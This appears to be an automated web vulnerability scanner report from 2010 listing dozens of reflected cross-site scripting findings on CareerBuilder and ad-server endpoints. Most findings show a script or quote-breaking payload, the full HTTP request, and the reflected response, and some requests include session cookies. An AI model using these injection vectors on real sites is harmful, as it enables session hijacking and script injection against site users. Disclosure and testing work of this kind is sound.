This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_TaxAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a521130"%20a%3db%2066d099a642a&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 196807 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_taxaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR25 Date: Sun, 14 Nov 2010 23:26:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7fe5'-alert(1)-'9425161b70b was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ac.ic/Florida_Miami/?lr=cbcb_mha7fe5'-alert(1)-'9425161b70b&SiteID=cbcb_mh030 HTTP/1.1 Host: admin-clerical.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 198212 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=c17e999a751943249031889b774a0aec-343070737-R4-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650B96FA49ADD94120890BA6EE7DBBB0B70BB73D4A957DF1B40E37136B4E087C94A7205966FE434239F; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:37 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:37 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL4 Date: Sun, 14 Nov 2010 22:25:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mha7fe5'-alert(1)-'9425161b70b&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8bf"%20a%3db%2039cb7791456 was submitted in the lr parameter. This input was echoed as 5f8bf" a=b 39cb7791456 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ac.ic/Florida_Miami/?lr=cbcb_mh5f8bf"%20a%3db%2039cb7791456&SiteID=cbcb_mh030 HTTP/1.1 Host: admin-clerical.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 197140 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=f66d76a56e6c49c092e6c437b5f1f0f0-343070714-RT-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650F8EA9F59001F10D230B0487CBA3492F4EAD435A55C0CBCAA310FAAEC46756DA0F487A1EAD80AC621; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:13 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:14 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL29 Date: Sun, 14 Nov 2010 22:25:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload e2b91<script>alert(1)</script>b3f2b434e17 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?placementId=20482&pid=589757e2b91<script>alert(1)</script>b3f2b434e17&ps=-1&zw=160&zh=626&url=http%3a%2f%2fwww.careerbuilder.com%2f%3flr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26ff%3d21%2fJobSeeker%2fJobs%2fJobResults.aspx%3fArgURL%3d%2fag.ic%2fFlorida_Miami%26lr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26argv0%3dFlorida_Miami%26SiteID%3dcbcb_mh031%26%26strcrit%3dQID%3dA3853799236048%3bst%3da%3buse%3dALL%3bTID%3d0%3bCTY%3dMiami%3bSID%3dFL%3bCID%3dUS%3bENR%3dNO%3bDTP%3dDRNS%3bYDI%3dYES%3bIND%3dALL%3bPDQ%3dAll%3bPDQ%3dAll%3bPAYL%3d0%3bPAYH%3dgt120%3bPOY%3dNO%3bETD%3dALL%3bRE%3dALL%3bMGT%3dDC%3bSUP%3dDC%3bFRE%3d30%3bCHL%3dag%3bQS%3dsid_unknown%3bSS%3dNO%3bTITL%3d0%3bOB%3d-modifiedint%3bRAD%3d30%3bJQT%3dRAD%3bJDV%3dFalse%3bExpHigh%3dgt50%3bExpLow%3d0%3bMaxLowExp%3d-1&v=5 HTTP/1.1 Host: ads.adsonar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 23:25:32 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Content-Length: 2497 Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=150, max=975 Connection: Keep-Alive
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "589757e2b91<script>alert(1)</script>b3f2b434e17"
The value of the placementId request parameter is copied into an HTML comment. The payload ad013--><script>alert(1)</script>679fce7bb3e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?placementId=20482ad013--><script>alert(1)</script>679fce7bb3e&pid=589757&ps=-1&zw=160&zh=626&url=http%3a%2f%2fwww.careerbuilder.com%2f%3flr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26ff%3d21%2fJobSeeker%2fJobs%2fJobResults.aspx%3fArgURL%3d%2fag.ic%2fFlorida_Miami%26lr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26argv0%3dFlorida_Miami%26SiteID%3dcbcb_mh031%26%26strcrit%3dQID%3dA3853799236048%3bst%3da%3buse%3dALL%3bTID%3d0%3bCTY%3dMiami%3bSID%3dFL%3bCID%3dUS%3bENR%3dNO%3bDTP%3dDRNS%3bYDI%3dYES%3bIND%3dALL%3bPDQ%3dAll%3bPDQ%3dAll%3bPAYL%3d0%3bPAYH%3dgt120%3bPOY%3dNO%3bETD%3dALL%3bRE%3dALL%3bMGT%3dDC%3bSUP%3dDC%3bFRE%3d30%3bCHL%3dag%3bQS%3dsid_unknown%3bSS%3dNO%3bTITL%3d0%3bOB%3d-modifiedint%3bRAD%3d30%3bJQT%3dRAD%3bJDV%3dFalse%3bExpHigh%3dgt50%3bExpLow%3d0%3bMaxLowExp%3d-1&v=5 HTTP/1.1 Host: ads.adsonar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "20482ad013--><script>alert(1)</script>679fce7bb3e" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload b8db5--><script>alert(1)</script>6b2d12adfe5 was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?placementId=20482&pid=589757&ps=-1b8db5--><script>alert(1)</script>6b2d12adfe5&zw=160&zh=626&url=http%3a%2f%2fwww.careerbuilder.com%2f%3flr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26ff%3d21%2fJobSeeker%2fJobs%2fJobResults.aspx%3fArgURL%3d%2fag.ic%2fFlorida_Miami%26lr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26argv0%3dFlorida_Miami%26SiteID%3dcbcb_mh031%26%26strcrit%3dQID%3dA3853799236048%3bst%3da%3buse%3dALL%3bTID%3d0%3bCTY%3dMiami%3bSID%3dFL%3bCID%3dUS%3bENR%3dNO%3bDTP%3dDRNS%3bYDI%3dYES%3bIND%3dALL%3bPDQ%3dAll%3bPDQ%3dAll%3bPAYL%3d0%3bPAYH%3dgt120%3bPOY%3dNO%3bETD%3dALL%3bRE%3dALL%3bMGT%3dDC%3bSUP%3dDC%3bFRE%3d30%3bCHL%3dag%3bQS%3dsid_unknown%3bSS%3dNO%3bTITL%3d0%3bOB%3d-modifiedint%3bRAD%3d30%3bJQT%3dRAD%3bJDV%3dFalse%3bExpHigh%3dgt50%3bExpLow%3d0%3bMaxLowExp%3d-1&v=5 HTTP/1.1 Host: ads.adsonar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-1b8db5--><script>alert(1)</script>6b2d12adfe5" -->
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 999f7"><script>alert(1)</script>20cb6235d4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.55. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d20"><script>alert(1)</script>056827e3655 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4831c><script>alert(1)</script>dcd50598372 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede1a"><script>alert(1)</script>a305855cafa was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5684d"><script>alert(1)</script>3285b7241f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd61c"><script>alert(1)</script>6e12a239d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 68f0e><script>alert(1)</script>1c8ca3d61d3 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b32d"><script>alert(1)</script>367d4ee1dd was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5747e"><script>alert(1)</script>99dd4217e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.63. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 719d3"><script>alert(1)</script>50f3b928662 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d22e4"><script>alert(1)</script>e1024253c05 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a3ae0><script>alert(1)</script>ce43ade6607 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40453"><script>alert(1)</script>7fbb26c9a98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.67. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 669cd"><script>alert(1)</script>17dfe9ed23c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 23a02><script>alert(1)</script>84b2b0ffe6a was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac568"><script>alert(1)</script>445b737e7e was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df345"><script>alert(1)</script>bd058dcb6b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.71. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62c2"><script>alert(1)</script>47db9872ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2786"><script>alert(1)</script>40b84c3f202 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload cf8d5><script>alert(1)</script>1317b9c8006 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce18d"><script>alert(1)</script>d45c1675446 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403936|0|225|ADTECHce18d"><script>alert(1)</script>d45c1675446 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 233
2.75. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe|3.0|5310.1|1403936|0|225|ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45421"><script>alert(1)</script>36b2f6b585b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403936|0|225|ADTECH?45421"><script>alert(1)</script>36b2f6b585b=1 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 236
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a09"><script>alert(1)</script>28c78281f47 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403936|0|225|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]e3a09"><script>alert(1)</script>28c78281f47 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 282
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 2fd4c><script>alert(1)</script>bc913fe8b87 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403936|0|225|ADTECH;target=2fd4c><script>alert(1)</script>bc913fe8b87 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 278
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6c42"><script>alert(1)</script>e423f98986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403940|0|225|ADTECHd6c42"><script>alert(1)</script>e423f98986 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 232
2.79. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe|3.0|5310.1|1403940|0|225|ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d43f"><script>alert(1)</script>1c76bda1778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403940|0|225|ADTECH?6d43f"><script>alert(1)</script>1c76bda1778=1 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 236
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f2a6f><script>alert(1)</script>8e8573dfda4 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403940|0|225|ADTECH;target=f2a6f><script>alert(1)</script>8e8573dfda4 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 278
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd610"><script>alert(1)</script>29d106ecc94 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403940|0|225|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]cd610"><script>alert(1)</script>29d106ecc94 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 282
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4437"><script>alert(1)</script>433a8f59407 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403944|0|170|ADTECHb4437"><script>alert(1)</script>433a8f59407 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 233
2.83. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe|3.0|5310.1|1403944|0|170|ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da704"><script>alert(1)</script>a7fa24a3079 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403944|0|170|ADTECH?da704"><script>alert(1)</script>a7fa24a3079=1 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 236
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e7f4a><script>alert(1)</script>713a8b0ffb8 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403944|0|170|ADTECH;target=e7f4a><script>alert(1)</script>713a8b0ffb8 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 278
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a402"><script>alert(1)</script>c6499242c01 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403944|0|170|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]7a402"><script>alert(1)</script>c6499242c01 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 282
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be529"><script>alert(1)</script>32ccf94e922 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403971|0|154|ADTECHbe529"><script>alert(1)</script>32ccf94e922 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 233
2.87. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe|3.0|5310.1|1403971|0|154|ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfde3"><script>alert(1)</script>86feb4edcdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403971|0|154|ADTECH?dfde3"><script>alert(1)</script>86feb4edcdc=1 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
